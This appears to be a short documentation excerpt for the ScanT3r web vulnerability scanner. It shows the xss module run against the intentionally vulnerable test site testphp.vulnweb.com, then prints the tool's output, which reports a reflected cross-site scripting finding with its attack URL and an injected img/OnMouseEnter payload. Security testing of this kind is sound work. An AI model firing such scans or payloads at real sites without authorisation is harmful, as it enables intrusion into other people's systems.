XSS

$ echo "http://testphp.vulnweb.com/listproducts.php?cat=1" | scant3r -m xss

   ____              __  ____
  / __/______ ____  / /_|_  /____
 _\ \/ __/ _ `/ _ \/ __//_ </ __/
/___/\__/\_,_/_//_/\__/____/_/

[+] Coded by: Khaled Nassar @knassar702
[+] Version: 0.9.3



🔥 Reflected Cross-site scripting
🎯 The Effected URL: http://testphp.vulnweb.com/listproducts.php?cat=1scanwrbr%22%3E%3Cimg+src%3Dx+OnMouseEnter%3D%28confirm%29%281%29%3EScanT3r
📄 XSS Location: text
💉 The Used Payload:  scanwrbr"><img src=x OnMouseEnter=(confirm)(1)>ScanT3r 

Last updated